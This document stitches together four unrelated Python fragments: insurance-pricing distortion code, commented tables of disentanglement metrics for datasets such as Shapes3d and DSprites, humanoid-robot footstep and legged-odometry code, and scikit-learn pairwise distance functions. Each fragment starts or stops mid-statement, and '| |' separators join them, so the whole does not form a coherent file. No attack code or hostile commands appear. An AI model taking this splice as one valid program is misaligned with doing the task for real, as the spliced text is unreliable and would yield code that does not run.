df['M.M_total'] / df['M.Q_total'],
gprime1)
# where is the ROE zero? need to handle separately else Q will blow up
roe_zero = (df['M.ROE_total'] == 0.0)
report_time('apply_distortion - first line loop complete')
# print(f"g'(0)={gprime1:.5f}\nroe zero vector {roe_zero}")
for line in self.line_names_ex:
report_time(f'apply_distortion - starting {line} loop 2')
# these are not used
# df[f'exa_{line}_pcttotal'] = df['exa_' + line] / df.exa_total
# df[f'exag_{line}_pcttotal'] = df['exag_' + line] / df.exag_total
# hummm more aliases
df[f'T.L_{line}'] = df[f'exa_{line}']
df[f'T.P_{line}'] = df[f'exag_{line}']
df.loc[0, f'T.P_{line}'] = 0
# TOTALs = ground up cumulative sums
# exag is the layer (marginal) premium and exa is the layer (marginal) loss
df[f'T.LR_{line}'] = df[f'exa_{line}'] / df[f'exag_{line}']
df[f'T.M_{line}'] = df[f'exag_{line}'] - df[f'exa_{line}']
df.loc[0, f'T.M_{line}'] = 0
# MARGINALs
# MM should be per unit width layer so need to divide by bs
# prepend=0 satisfies: if
# d['B'] = d.A.cumsum()
# d['C'] = np.diff(d.B, prepend=0)
# then d.C == d.A, which is what you want.
# note this overwrites M.M_total set above
# T.M starts at zero, by previous line and sense: no assets ==> no prem or loss
# old
# df[f'M.M_{line}'] = np.diff(df[f'T.M_{line}'], prepend=0) / self.bs
# new:
df[f'M.M_{line}'] = df[f'T.M_{line}'].diff().shift(-1) / self.bs
# careful about where ROE==0
df[f'M.Q_{line}'] = df[f'M.M_{line}'] / df['M.ROE_total']
df[f'M.Q_{line}'].iloc[-1] = 0
df.loc[roe_zero, f'M.Q_{line}'] = np.nan
# WHAT IS THE LAYER AT ZERO? Should it have a price? What is that price?
# TL and TP at zero are both 1
if line != 'total':
df[f'M.L_{line}'] = df[f'exi_xgta_{line}'] * df['S']
df[f'M.P_{line}'] = df[f'exi_xgtag_{line}'] * df['gS']
df[f'M.LR_{line}'] = df[f'M.L_{line}'] / df[f'M.P_{line}']
# for total need to reflect layer width...
# Jan 2020 added shift down
df[f'T.Q_{line}'] = df[f'M.Q_{line}'].shift(1).cumsum() * self.bs
df.loc[0, f'T.Q_{line}'] = 0
df[f'T.ROE_{line}'] = df[f'T.M_{line}'] / df[f'T.Q_{line}']
# leverage
df[f'T.PQ_{line}'] = df[f'T.P_{line}'] / df[f'T.Q_{line}']
df[f'M.PQ_{line}'] = df[f'M.P_{line}'] / df[f'M.Q_{line}']
# in order | |
0.04 & 0.04 & 0.50 & 0.01 & 0.00
# [Cars3d] random & 17568 & 0.56 & 0.13 & 0.15 & 0.54 & 0.10 & 0.04
#
# [Shapes3d] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [Shapes3d] floor_hue & 10 & 0.82 & 0.76 & 0.62 & 0.82 & 0.74 & 0.60
# [Shapes3d] wall_hue & 10 & 0.82 & 0.74 & 0.60 & 0.82 & 0.72 & 0.55
# [Shapes3d] object_hue & 10 & 0.82 & 0.71 & 0.53 & 0.82 & 0.63 & 0.41
# [Shapes3d] scale & 8 & 0.95 & 0.88 & 0.81 & 0.95 & 0.87 & 0.71
# [Shapes3d] shape & 4 & 0.91 & 0.79 & 0.69 & 0.90 & 0.80 & 0.58
# [Shapes3d] orientation & 15 & 0.94 & 0.92 & 0.84 & 0.89 & 0.87 & 0.74
# [Shapes3d] random & 480000 & 0.66 & 0.45 & 0.53 & 0.60 & 0.29 & 0.29
#
# [SmallNorb] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [SmallNorb] category & 5 & 0.75 & 0.53 & 0.44 & 0.73 & 0.47 & 0.15
# [SmallNorb] instance & 5 & 0.73 & 0.52 & 0.37 & 0.73 & 0.51 & 0.10
# [SmallNorb] elevation & 9 & 0.94 & 0.90 & 0.81 & 0.78 & 0.64 & 0.51
# [SmallNorb] rotation & 18 & 0.61 & 0.19 & 0.12 & 0.60 & 0.21 & 0.07
# [SmallNorb] lighting & 6 & 0.64 & 0.29 & 0.07 & 0.64 & 0.28 & 0.07
# [SmallNorb] random & 24300 & 0.54 & 0.14 & 0.10 & 0.54 & 0.14 & 0.07
#
# [DSprites] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [DSprites] shape & 3 & 0.83 & 0.72 & 0.66 & 0.93 & 0.87 & 0.66
# [DSprites] scale & 6 & 0.95 & 0.95 & 0.93 & 0.94 & 0.96 & 0.84
# [DSprites] orientation & 40 & 0.60 & 0.17 & 0.13 & 0.63 & 0.21 & 0.15
# [DSprites] position_x & 32 & 0.90 & 0.75 & 0.66 & 0.99 & 0.83 & 0.63
# [DSprites] position_y & 32 & 0.90 & 0.75 & 0.65 & 0.99 & 0.83 & 0.63
# [DSprites] random & 737280 & 0.64 & 0.38 & 0.43 & 0.66 & 0.36 & 0.29
#
# [XYSquares-1-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-1-8] x_R & 8 & 1.00 & 1.00 & 1.00 & 0.97 & 0.99 & 0.98
# [XYSquares-1-8] random & 262144 & 0.90 & 0.97 & 0.98 & 0.91 & 0.98 & 0.98
#
# [XYSquares-2-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-2-8] x_R & 8 & 0.92 & 0.99 & 0.94 & 0.96 & 0.99 & 0.99
# [XYSquares-2-8] random & 262144 & 0.77 & 0.83 & 0.85 & 0.92 & 0.99 & 0.99
#
# [XYSquares-3-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-3-8] x_R & 8 & 0.84 & 0.95 & 0.86 & 0.96 & 0.99 & 0.99
# [XYSquares-3-8] random & 262144 & 0.68 & 0.73 & 0.75 & 0.92 & 0.99 & 0.99
#
# [XYSquares-4-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-4-8] x_R & 8 & 0.67 & 0.85 & 0.75 & 0.96 & 0.99 & 0.99
# [XYSquares-4-8] random & 262144 & 0.47 & 0.58 & 0.67 & 0.92 & 0.99 & 0.99
#
# [XYSquares-5-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-5-8] x_R & 8 & 0.67 & 0.85 & 0.72 & 0.95 & 0.99 & 0.99
# [XYSquares-5-8] random & 262144 & 0.47 & 0.58 & 0.64 & 0.92 & 0.98 & 0.99
#
# [XYSquares-6-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-6-8] x_R & 8 & 0.67 & 0.85 & 0.67 & 0.96 & 0.98 & 0.98
# [XYSquares-6-8] random & 262144 & 0.47 & 0.58 & 0.61 & 0.90 & 0.97 & 0.98
#
# [XYSquares-7-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-7-8] x_R & 8 & 0.67 & 0.85 & 0.60 & 0.96 & 0.98 & 0.97
# [XYSquares-7-8] random & 262144 & 0.47 & 0.58 & 0.59 & 0.89 & 0.96 & 0.96
#
# [XYSquares-8-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-8-8] x_R & 8 & 0.39 & 0.58 & 0.52 & 0.95 & 0.97 & 0.96
# [XYSquares-8-8] random & 262144 & 0.21 & 0.37 & 0.55 & 0.87 & 0.94 & 0.95
# ========================================================================= #
# Results - Reformatted #
# ========================================================================= #
# [Cars3d] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [Cars3d] elevation & 0.90 & 0.93 & 0.69 & 0.88
# [Cars3d] azimuth & 0.30 & 0.34 & 0.08 & 0.25
# [Cars3d] object_type & 0.04 & 0.04 & 0.00 & 0.01
# [Cars3d] random & 0.15 & 0.13 & 0.04 & 0.10
#
# [Shapes3d] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [Shapes3d] floor_hue & 0.62 & 0.76 & 0.60 & 0.74
# [Shapes3d] wall_hue & 0.60 & 0.74 & 0.55 & 0.72
# [Shapes3d] object_hue & 0.53 & 0.71 & 0.41 & 0.63
# [Shapes3d] scale & 0.81 & 0.88 & 0.71 & 0.87
# [Shapes3d] shape & 0.69 & 0.79 & 0.58 & 0.80
# [Shapes3d] orientation & 0.84 & 0.92 & 0.74 & 0.87
# [Shapes3d] random & 0.53 & 0.45 & 0.29 & 0.29
#
# [SmallNorb] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [SmallNorb] category & 0.44 & 0.53 & 0.15 & 0.47
# [SmallNorb] instance & 0.37 & 0.52 & 0.10 & 0.51
# [SmallNorb] elevation & 0.81 & 0.90 & 0.51 & 0.64
# [SmallNorb] rotation & 0.12 & 0.19 & 0.07 & 0.21
# [SmallNorb] lighting & 0.07 & 0.29 & 0.07 & 0.28
# [SmallNorb] random & 0.10 & 0.14 & 0.07 & 0.14
#
# [DSprites] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [DSprites] shape & 0.66 & 0.72 & 0.66 & 0.87
# [DSprites] scale & 0.93 & 0.95 & 0.84 & 0.96
# [DSprites] orientation & 0.13 & 0.17 & 0.15 & 0.21
# [DSprites] position_x & 0.66 & 0.75 & 0.63 & 0.83
# [DSprites] position_y & 0.65 & 0.75 & 0.63 & 0.83
# [DSprites] random & 0.43 & 0.38 & 0.29 & 0.36
#
# [XYSquares-1-8] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [XYSquares-1-8] x_R & 1.00 & 1.00 & 0.98 & 0.99
# [XYSquares-1-8] random & 0.98 & 0.97 & 0.98 & 0.98
#
# [XYSquares-2-8] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [XYSquares-2-8] x_R & 0.94 & 0.99 & 0.99 & 0.99
# [XYSquares-2-8] random & 0.85 & 0.83 & 0.99 & 0.99
#
# [XYSquares-3-8] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [XYSquares-3-8] x_R & 0.86 & 0.95 & 0.99 & 0.99
# [XYSquares-3-8] random & 0.75 & 0.73 & 0.99 & 0.99
#
# [XYSquares-4-8] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [XYSquares-4-8] x_R & 0.75 & 0.85 & 0.99 & 0.99
# [XYSquares-4-8] random & | |
for the generated footsteps
footsteps_path: str
# Footsteps scaling factor
footstep_scaling: float
# Time scaling factor
time_scaling: int
# Footsteps list
contact_phase_list: blf.contacts.ContactPhaseList = None
@staticmethod
def build(footsteps_path: str, footstep_scaling: float, time_scaling: int) -> "FootstepsExtractor":
"""Build an instance of FootstepsExtractor."""
return FootstepsExtractor(footsteps_path=footsteps_path,
footstep_scaling=footstep_scaling,
time_scaling=time_scaling)
def retrieve_contacts(self) -> None:
"""Retrieve and scale the footsteps of the generated trajectory. Plot original and scaled footsteps."""
# Create the map of contact lists
contact_list_map = dict()
# Names of the feet frames
rfoot_frame = "r_sole"
lfoot_frame = "l_sole"
# Create the contact lists
contact_list_map[rfoot_frame] = blf.contacts.ContactList()
contact_list_map[lfoot_frame] = blf.contacts.ContactList()
# Retrieve the footsteps from a JSON file
with open(self.footsteps_path, 'r') as infile:
contacts = json.load(infile)
l_contacts = contacts["l_foot"]
r_contacts = contacts["r_foot"]
# Storage fot plotting unscaled vs scaled footsteps
unscaled_left_footsteps_x = []
unscaled_left_footsteps_y = []
unscaled_right_footsteps_x = []
unscaled_right_footsteps_y = []
left_footsteps_x = []
left_footsteps_y = []
right_footsteps_x = []
right_footsteps_y = []
# ===============================
# INITIAL LEFT AND RIGHT CONTACTS
# ===============================
# Retrieve first left contact position
ground_l_foot_position = [l_contacts[0]["2D_pos"][0], l_contacts[0]["2D_pos"][1], 0]
ground_l_foot_position_gazebo = [0, 0.08, 0]
ground_l_foot_position_offset = np.array(ground_l_foot_position_gazebo) - np.array(ground_l_foot_position)
ground_l_foot_position += np.array(ground_l_foot_position_offset)
# Retrieve first left contact orientation
l_foot_yaw = l_contacts[0]["2D_orient"]
l_foot_RPY = [0.0, 0.0, l_foot_yaw]
l_foot_rot = Rotation.from_euler('xyz', l_foot_RPY)
l_foot_quat = l_foot_rot.as_quat()
l_deactivation_time = self.time_scaling * (l_contacts[0]["deactivation_time"])
# Retrieve first right contact position
ground_r_foot_position = [r_contacts[0]["2D_pos"][0], r_contacts[0]["2D_pos"][1], 0]
ground_r_foot_position_gazebo = [0, -0.08, 0]
ground_r_foot_position_offset = np.array(ground_r_foot_position_gazebo) - np.array(ground_r_foot_position)
ground_r_foot_position += np.array(ground_r_foot_position_offset)
# Retrieve first right contact orientation
r_foot_yaw = r_contacts[0]["2D_orient"]
r_foot_RPY = [0.0, 0.0, r_foot_yaw]
r_foot_rot = Rotation.from_euler('xyz', r_foot_RPY)
r_foot_quat = r_foot_rot.as_quat()
r_deactivation_time = self.time_scaling * (r_contacts[0]["deactivation_time"])
# Add initial left and right contacts to the list
assert contact_list_map[lfoot_frame].add_contact(
transform=manif.SE3(position=np.array(ground_l_foot_position),
quaternion=l_foot_quat),
activation_time=0.0,
deactivation_time=l_deactivation_time)
assert contact_list_map[rfoot_frame].add_contact(
transform=manif.SE3(position=np.array(ground_r_foot_position),
quaternion=r_foot_quat),
activation_time=0.0,
deactivation_time=r_deactivation_time)
# ===================
# SCALE LEFT CONTACTS
# ===================
# Store the previous unscaled and scaled contact (use the initial contact for both at the beginning)
prev_contact = ground_l_foot_position
prev_unscaled_contact = ground_l_foot_position
# Update storage for plotting
unscaled_left_footsteps_x.append(ground_l_foot_position[0])
unscaled_left_footsteps_y.append(ground_l_foot_position[1])
left_footsteps_x.append(ground_l_foot_position[0])
left_footsteps_y.append(ground_l_foot_position[1])
# Store unscaled contacts
unscaled_l_contacts = []
for contact in l_contacts[1:]:
# Retrieve position
ground_l_foot_position = [contact["2D_pos"][0], contact["2D_pos"][1], 0]
ground_l_foot_position += np.array(ground_l_foot_position_offset)
# Update unscaled contact list and storage for plotting
unscaled_l_contacts.append(ground_l_foot_position)
unscaled_left_footsteps_x.append(ground_l_foot_position[0])
unscaled_left_footsteps_y.append(ground_l_foot_position[1])
# Scale contacts
for i in range(len(l_contacts[1:])):
contact = l_contacts[1:][i] # take orientation and timing from the original contact
unscaled_contact = unscaled_l_contacts[i] # take position from unscaled contacts
# Retrieve the distance between two consecutive contacts of the same foot
ground_l_foot_position = [unscaled_contact[0], unscaled_contact[1], 0]
distance = ground_l_foot_position - np.array(prev_unscaled_contact)
# Scale the step
scaled_distance = self.footstep_scaling * distance
# Compute the next contact as the previous contact plus the scaled step
ground_l_foot_position = prev_contact + [scaled_distance[0], scaled_distance[1], 0]
# Update the variables keeping track of the previous scaled and unscaled contacts
prev_unscaled_contact = [unscaled_contact[0], unscaled_contact[1], 0]
prev_contact = ground_l_foot_position
# Update the storage for plotting
left_footsteps_x.append(ground_l_foot_position[0])
left_footsteps_y.append(ground_l_foot_position[1])
# Retrieve orientation and timing from the original contact
l_foot_RPY = [0.0, 0.0, contact["2D_orient"]]
l_foot_rot = Rotation.from_euler('xyz', l_foot_RPY)
l_foot_quat = l_foot_rot.as_quat()
l_activation_time = self.time_scaling * (contact["activation_time"])
l_deactivation_time = self.time_scaling * (contact["deactivation_time"])
# Add the contact
assert contact_list_map[lfoot_frame].add_contact(
transform=manif.SE3(position=np.array(ground_l_foot_position), quaternion=l_foot_quat),
activation_time=l_activation_time,
deactivation_time=l_deactivation_time)
# ====================
# SCALE RIGHT CONTACTS
# ====================
# Store the previous unscaled and scaled contact (use the initial contact for both at the beginning)
prev_contact = ground_r_foot_position
prev_unscaled_contact = ground_r_foot_position
# Update storage for plotting
unscaled_right_footsteps_x.append(ground_r_foot_position[0])
unscaled_right_footsteps_y.append(ground_r_foot_position[1])
right_footsteps_x.append(ground_r_foot_position[0])
right_footsteps_y.append(ground_r_foot_position[1])
# Store unscaled contacts
unscaled_r_contacts = []
for contact in r_contacts[1:]:
# Retrieve position
ground_r_foot_position = [contact["2D_pos"][0], contact["2D_pos"][1], 0]
ground_r_foot_position += np.array(ground_r_foot_position_offset)
# Update unscaled contact list and storage for plotting
unscaled_r_contacts.append(ground_r_foot_position)
unscaled_right_footsteps_x.append(ground_r_foot_position[0])
unscaled_right_footsteps_y.append(ground_r_foot_position[1])
# Scale contacts
for i in range(len(r_contacts[1:])):
contact = r_contacts[1:][i] # take orientation and timing from the original contact
unscaled_contact = unscaled_r_contacts[i] # take position from unscaled contacts
# Retrieve the distance between two consecutive contacts of the same foot
ground_r_foot_position = [unscaled_contact[0], unscaled_contact[1], 0]
distance = ground_r_foot_position - np.array(prev_unscaled_contact)
# Scale the step
scaled_distance = self.footstep_scaling * distance
# Compute the next contact as the previous contact plus the scaled step
ground_r_foot_position = prev_contact + [scaled_distance[0], scaled_distance[1], 0]
# Update the variables keeping track of the previous scaled and unscaled contacts
prev_unscaled_contact = [unscaled_contact[0], unscaled_contact[1], 0]
prev_contact = ground_r_foot_position
# Update the storage for plotting
right_footsteps_x.append(ground_r_foot_position[0])
right_footsteps_y.append(ground_r_foot_position[1])
# Retrieve orientation and timing from the original contact
r_foot_RPY = [0.0, 0.0, contact["2D_orient"]]
r_foot_rot = Rotation.from_euler('xyz', r_foot_RPY)
r_foot_quat = r_foot_rot.as_quat()
r_activation_time = self.time_scaling * (contact["activation_time"])
r_deactivation_time = self.time_scaling * (contact["deactivation_time"])
# Add the contact
assert contact_list_map[rfoot_frame].add_contact(
transform=manif.SE3(position=np.array(ground_r_foot_position), quaternion=r_foot_quat),
activation_time=r_activation_time,
deactivation_time=r_deactivation_time)
# ============================
# PLOT AND ASSIGN CONTACT LIST
# ============================
# Plot unscaled vs scaled footsteps
plt.figure()
plt.plot(unscaled_left_footsteps_x, unscaled_left_footsteps_y, 'r')
plt.plot(unscaled_right_footsteps_x, unscaled_right_footsteps_y, 'r')
plt.scatter(unscaled_left_footsteps_x, unscaled_left_footsteps_y, c='r')
plt.scatter(unscaled_right_footsteps_x, unscaled_right_footsteps_y, c='r')
plt.plot(left_footsteps_x, left_footsteps_y, 'b')
plt.plot(right_footsteps_x, right_footsteps_y, 'b')
plt.scatter(left_footsteps_x, left_footsteps_y, c='b')
plt.scatter(right_footsteps_x, right_footsteps_y, c='b')
plt.title("Unscaled footsteps (red) VS scaled footsteps (blue)")
plt.axis("equal")
plt.show(block=False)
plt.pause(1.0)
# Assign contact list
phase_list = blf.contacts.ContactPhaseList()
phase_list.set_lists(contact_lists=contact_list_map)
self.contact_phase_list = phase_list
@dataclass
class PosturalExtractor:
"""Class to extract the postural at the desired frequency from the generated trajectory."""
# Path for the generated footsteps
posturals_path: str
# Time scaling factor
time_scaling: int
# Fixed offset for the shoulder pitch and roll in order to spread the arms
shoulder_offset: float
# Joint postural references
joint_references: List = field(default_factory=list)
@staticmethod
def build(posturals_path: str,
time_scaling: int,
shoulder_offset: float = 0.15) -> "PosturalExtractor":
"""Build an instance of PosturalExtractor."""
return PosturalExtractor(posturals_path=posturals_path,
time_scaling=time_scaling,
shoulder_offset=shoulder_offset)
def retrieve_joint_references(self, joints_list: List) -> None:
"""Retrieve postural references at the desired frequency from the generated trajectory."""
# Retrieve original joint posturals from a JSON file
with open(self.posturals_path, 'r') as openfile:
posturals = json.load(openfile)
joint_posturals = posturals["joints"]
# Initialize list for the postural references at the desired frequency
joint_references = []
# Replicate the postural from adherent (frequency: 50 Hz) as many times as you need
for joint_postural in joint_posturals:
# 2 is to go from 50Hz (trajectory generation frequency) to 100Hz (trajectory control frequency),
# then you need to take into account the time_scaling factor
for i in range(2 * self.time_scaling):
joint_reference = []
for joint in joints_list:
if joint not in ["l_shoulder_roll", "r_shoulder_roll", "l_shoulder_pitch", "r_shoulder_pitch"]:
# Keep the joint postural as it is for the joints which are not in the shoulders
joint_reference.append(joint_postural[joint])
else:
# Spread the arms by adding a fixed offset to the shoulder joints
joint_reference.append(joint_postural[joint] + self.shoulder_offset)
joint_references.append(joint_reference)
# Assign joint references
self.joint_references = joint_references
@dataclass
class LeggedOdometry:
"""Class for the computations related to the legged odometry estimator."""
# Legged odometry
lo_kindyn_desc: blf.floating_base_estimators.KinDynComputationsDescriptor
legged_odom: blf.floating_base_estimators.LeggedOdometry
# Fixed foot detector
fixed_foot_detector: blf.contacts.FixedFootDetector
foot_name_to_index: Dict
# Base transform and velocity
world_H_base: np.array = field(default_factory=lambda: np.array([]))
base_twist: np.array = field(default_factory=lambda: np.array([]))
# Fixed foot related quantities
fixed_foot: blf.contacts.EstimatedContact = None
fixed_foot_index: int = 0
@staticmethod
def build(robot_urdf: str, joints_list: List, dt: float, foot_name_to_index: Dict) -> "LeggedOdometry":
"""Build an instance of LeggedOdometry."""
# Create KinDynComputationsDescriptor for legged odometry
lo_kindyn_handler = blf.parameters_handler.StdParametersHandler()
lo_kindyn_handler.set_parameter_string("model_file_name", robot_urdf)
lo_kindyn_handler.set_parameter_vector_string("joints_list", joints_list)
lo_kindyn_desc = blf.floating_base_estimators.construct_kindyncomputations_descriptor(lo_kindyn_handler)
assert lo_kindyn_desc.is_valid()
# Legged odometry configuration
lo_params_handler = blf.parameters_handler.StdParametersHandler()
lo_params_handler.set_parameter_float("sampling_period_in_s", dt)
model_info_group = blf.parameters_handler.StdParametersHandler()
model_info_group.set_parameter_string("base_link", "root_link")
model_info_group.set_parameter_string("base_link_imu", "root_link")
model_info_group.set_parameter_string("left_foot_contact_frame", "l_sole")
model_info_group.set_parameter_string("right_foot_contact_frame", "r_sole")
assert (lo_params_handler.set_group("ModelInfo", model_info_group))
lo_group = blf.parameters_handler.StdParametersHandler()
lo_group.set_parameter_string("initial_fixed_frame", "l_sole")
lo_group.set_parameter_string("switching_pattern", "useExternal")
assert lo_params_handler.set_group("LeggedOdom", lo_group)
# Instantiate legged odometry
legged_odom = blf.floating_base_estimators.LeggedOdometry()
legged_odom.initialize(lo_params_handler, lo_kindyn_desc.kindyn)
# Fixed foot detector configuration
fixed_foot_detector_handler = blf.parameters_handler.StdParametersHandler()
fixed_foot_detector_handler.set_parameter_float("sampling_time", dt)
# Instantiate fixed foot detector
fixed_foot_detector = blf.contacts.FixedFootDetector()
fixed_foot_detector.initialize(fixed_foot_detector_handler)
return LeggedOdometry(lo_kindyn_desc=lo_kindyn_desc,
legged_odom=legged_odom,
fixed_foot_detector=fixed_foot_detector,
foot_name_to_index=foot_name_to_index)
def configure(self, contact_phase_list: blf.contacts.ContactList, joints_values: np.array,
joints_velocities: np.array) -> (np.array, np.array):
"""Initial configuration of the legged odometry estimator and the fixed foot detector."""
# Pass the list of contacts to the fixed foot detector
self.fixed_foot_detector.set_contact_phase_list(contact_phase_list)
# Fill measurement buffers
self.legged_odom.set_kinematics(joints_values, joints_velocities)
# Retrieve initial fixed foot
self.fixed_foot = self.fixed_foot_detector.get_fixed_foot()
# Advance the legged odometry estimator
assert self.legged_odom.set_contact_status(self.fixed_foot.name, self.fixed_foot.is_active,
self.fixed_foot.switch_time, self.fixed_foot.last_update_time)
assert self.legged_odom.advance()
# Update the fixed frame
self.fixed_foot_index = self.foot_name_to_index[self.fixed_foot.name]
self.legged_odom.change_fixed_frame(self.fixed_foot_index, self.fixed_foot.pose.quat(),
self.fixed_foot.pose.translation())
# Retrieve the output of the legged odometry
out = self.legged_odom.get_output()
self.world_H_base = out.base_pose.transform()
self.base_twist = out.base_twist
return self.world_H_base, self.base_twist
def update(self, joints_values: np.array, joints_velocities: np.array) -> (np.array, np.array):
| |
Y.shape[1] == %d" % (
X.shape[1], Y.shape[1]))
return X, Y
def manhattan_distances(X, Y=None, sum_over_features=True,
size_threshold=None):
""" Compute the L1 distances between the vectors in X and Y.
With sum_over_features equal to False it returns the componentwise
distances.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : array_like
An array with shape (n_samples_X, n_features).
Y : array_like, optional
An array with shape (n_samples_Y, n_features).
sum_over_features : bool, default=True
If True the function returns the pairwise distance matrix
else it returns the componentwise L1 pairwise-distances.
Not supported for sparse matrix inputs.
size_threshold : int, default=5e8
Unused parameter.
Returns
-------
D : array
If sum_over_features is False shape is
(n_samples_X * n_samples_Y, n_features) and D contains the
componentwise L1 pairwise-distances (ie. absolute difference),
else shape is (n_samples_X, n_samples_Y) and D contains
the pairwise L1 distances.
Examples
--------
>>> from sklearn.metrics.pairwise import manhattan_distances
>>> manhattan_distances([[3]], [[3]])#doctest:+ELLIPSIS
array([[ 0.]])
>>> manhattan_distances([[3]], [[2]])#doctest:+ELLIPSIS
array([[ 1.]])
>>> manhattan_distances([[2]], [[3]])#doctest:+ELLIPSIS
array([[ 1.]])
>>> manhattan_distances([[1, 2], [3, 4]],\
[[1, 2], [0, 3]])#doctest:+ELLIPSIS
array([[ 0., 2.],
[ 4., 4.]])
>>> import numpy as np
>>> X = np.ones((1, 2))
>>> y = 2 * np.ones((2, 2))
>>> manhattan_distances(X, y, sum_over_features=False)#doctest:+ELLIPSIS
array([[ 1., 1.],
[ 1., 1.]]...)
"""
if size_threshold is not None:
warnings.warn('Use of the "size_threshold" is deprecated '
'in 0.19 and it will be removed version '
'0.21 of scikit-learn', DeprecationWarning)
X, Y = check_pairwise_arrays(X, Y)
if issparse(X) or issparse(Y):
if not sum_over_features:
raise TypeError("sum_over_features=%r not supported"
" for sparse matrices" % sum_over_features)
X = csr_matrix(X, copy=False)
Y = csr_matrix(Y, copy=False)
D = np.zeros((X.shape[0], Y.shape[0]))
_sparse_manhattan(X.data, X.indices, X.indptr,
Y.data, Y.indices, Y.indptr,
X.shape[1], D)
return D
if sum_over_features:
return distance.cdist(X, Y, 'cityblock')
D = X[:, np.newaxis, :] - Y[np.newaxis, :, :]
D = np.abs(D, D)
return D.reshape((-1, X.shape[1]))
def cosine_distances(X, Y=None):
"""Compute cosine distance between samples in X and Y.
Cosine distance is defined as 1.0 minus the cosine similarity.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : array_like, sparse matrix
with shape (n_samples_X, n_features).
Y : array_like, sparse matrix (optional)
with shape (n_samples_Y, n_features).
Returns
-------
distance matrix : array
An array with shape (n_samples_X, n_samples_Y).
See also
--------
sklearn.metrics.pairwise.cosine_similarity
scipy.spatial.distance.cosine (dense matrices only)
"""
# 1.0 - cosine_similarity(X, Y) without copy
S = cosine_similarity(X, Y)
S *= -1
S += 1
np.clip(S, 0, 2, out=S)
if X is Y or Y is None:
# Ensure that distances between vectors and themselves are set to 0.0.
# This may not be the case due to floating point rounding errors.
S[np.diag_indices_from(S)] = 0.0
return S
PAIRWISE_DISTANCE_FUNCTIONS = {
# If updating this dictionary, update the doc in both distance_metrics()
# and also in pairwise_distances()!
'cityblock': manhattan_distances,
'cosine': cosine_distances,
'euclidean': euclidean_distances,
'l2': euclidean_distances,
'l1': manhattan_distances,
'manhattan': manhattan_distances,
'precomputed': None, # HACK: precomputed is always allowed, never called
}
def pairwise_distances(X, Y=None, metric="euclidean", n_jobs=1, **kwds):
""" Compute the distance matrix from a vector array X and optional Y.
This method takes either a vector array or a distance matrix, and returns
a distance matrix. If the input is a vector array, the distances are
computed. If the input is a distances matrix, it is returned instead.
This method provides a safe way to take a distance matrix as input, while
preserving compatibility with many other algorithms that take a vector
array.
If Y is given (default is None), then the returned matrix is the pairwise
distance between the arrays from both X and Y.
Valid values for metric are:
- From scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
'manhattan']. These metrics support sparse matrix inputs.
- From scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis',
'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
'sokalmichener', 'sokalsneath', 'sqeuclidean', 'yule']
See the documentation for scipy.spatial.distance for details on these
metrics. These metrics do not support sparse matrix inputs.
Note that in the case of 'cityblock', 'cosine' and 'euclidean' (which are
valid scipy.spatial.distance metrics), the scikit-learn implementation
will be used, which is faster and has support for sparse matrices (except
for 'cityblock'). For a verbose description of the metrics from
scikit-learn, see the __doc__ of the sklearn.pairwise.distance_metrics
function.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
[n_samples_a, n_features] otherwise
Array of pairwise distances between samples, or a feature array.
Y : array [n_samples_b, n_features], optional
An optional second feature array. Only allowed if metric != "precomputed".
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by scipy.spatial.distance.pdist for its metric parameter, or
a metric listed in pairwise.PAIRWISE_DISTANCE_FUNCTIONS.
If metric is "precomputed", X is assumed to be a distance matrix.
Alternatively, if metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
